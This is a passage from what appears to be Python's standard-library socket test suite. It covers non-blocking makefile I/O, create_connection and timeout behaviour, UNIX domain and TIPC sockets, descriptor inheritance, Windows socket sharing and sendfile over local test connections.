self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid cloding the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# plaform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
